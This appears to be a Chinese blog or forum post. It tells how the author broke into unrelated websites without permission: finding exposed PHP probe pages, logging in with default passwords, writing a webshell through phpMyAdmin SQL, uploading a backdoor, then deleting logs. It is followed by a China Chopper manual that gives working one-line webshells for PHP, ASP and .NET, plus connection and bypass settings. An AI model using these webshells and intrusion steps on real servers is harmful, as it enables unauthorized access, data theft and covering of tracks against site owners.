刀菜需要自己做变形,加载失败可能是服务器WAF拦截了,传统一句话优化看这:那些强悍的PHP一句话后门;推荐使用新技术:“冰蝎”动态二进制加密网站管理客户端,WebShell工具
时间:2018-11-15
ID:joker_vip()
这是本人第一次在这个论坛发表学术文章,希望我的文章能够给一些新手一些帮助,如果有问题,希望大佬们能轻喷。因为我也是在校大学生,也是信息安全方面的爱好者,所以这些渗透只是也全是自学的,也希望有大佬指点指点我,带一带我。
这次的渗透是半运气+半技术的成果,首先在谷歌搜索引擎中批量查找存在PHP探针的网站,类似于下图(图1)这种网页。
之后我在网页下方尝试使用弱口令进行连接,绝大多数网站都是改过密码的,使用弱口令失败。
只有极少数的网站可能使用默认密码,类似于图3。
连接成功后,点击phpMyAdmin管理。
进入到登陆页面,进行刚刚测试的弱口令对其登陆,登陆成功了。
成功进入到管理后台中。
执行sql语句,进行插入一句话木马。
目录路径为这个。
点击执行,执行成功。
使用中国菜刀对一句话进行连接。
连接成功。
之后上传大马后门。
访问大马,成功进入,有趣的是本人通过扫描还发现了文件中存在其他木马,秉承着道德良好的品行,义不容辞的帮助此站删除了其他木马后门。
测试完成后,联系其网站管理员,发现是一美国的服务器,无奈英语不好的我只有用谷歌翻译向网站管理员发送邮件说明情况,对方回应会修复其漏洞,最后我删除上传的木马,删除日志,一气呵成,深藏功与名。
最后提一句,网站测试不等于搞破坏,挂黑页、删库等恶劣行为,最好不要进行上述等 *** 作。希望大家都能成为信息安全领域的大佬。
时间:2018-11-15
ID:joker_vip()
只要支持动态脚本的网站,都可以用中国菜刀来进行管理!主要功能有:文件管理,虚拟终端,数据库管理。
UINCODE方式编译,支持多国语言输入显示。
一、EVAL客户端部分
1)要了解的
服务端只需要简单的一行代码,即可用此程序实现常用的管理功能。
支持的服务端脚本:PHP, ASP,NET。
在服务端运行的代码如下:
PHP: <?php @eval($_POST['pass'])?>
ASP: <%eval request(pass)%>
.NET: <%@ Page Language=Jscript%><%eval(Request.Item[pass],unsafe)%>
(注意: .NET要单独一个文件或此文件也是Jscript语言)
2)怎么用
在主视图中右键/添加,在d出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,保存后即可使用文件管理,虚拟终端,数据库管理三大块功能。要是其它都没错误,那么可能就是你把语言编码选错了。
1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录
2.虚拟终端:[特色]人性化的设计, *** 作方便(输入HELP查看更多用法)
3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS
以入支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
注意:由于服务器的安全设置,某些功能可能不能正常使用。
3) 关于配置信息怎么填?
A) 数据库方面:
PHP脚本:
<T>类型</T>类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种
<H>主机地址<H>主机地址可为机器名或IP地址,如localhost
<U>数据库用户</U>连接数据库的用户名,如root
<P>数据库密码</P>连接数据库的密码,如123455
ASP和.NET脚本:
<T>类型</T>类型只能填ADO
<C>ADO配置信息</C>
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server}Server=(local)Database=masterUid=saPwd=123456
B) 其它方面:
添加额外附加提交的数据:应付这种情况:if ($_POST['action']=='test'){@eval($_POST['pass'])}
<O>action=test</O>
提交功能前先POST额外的数据包:会话期间只提交一次。
<DATA>uid=user1&pwd=123456</DATA>
二、网站蜘蛛
织出一张网站的目录结构。
下载的列表文件存在桌面,右键菜单/载入URL列表即可以根据地址得到目录结构。
三、定时提醒
当闹钟事使吧, 周期:每月/每周/每日/只一次。
四、快速启动
一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是以加密存储的。
五、浏览器
地址栏输入HELP,更多精彩后续加入。
六、其它部分
等待加入。
附带工具
update.exe是wsc.exe的数据库wscdb迁移到菜刀的一个小工具。
把wscdb文件整到当前目录,运行update.exe得到新的数据库文件caidao.mdb
把菜刀的数据库db.mdb替换掉即可。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)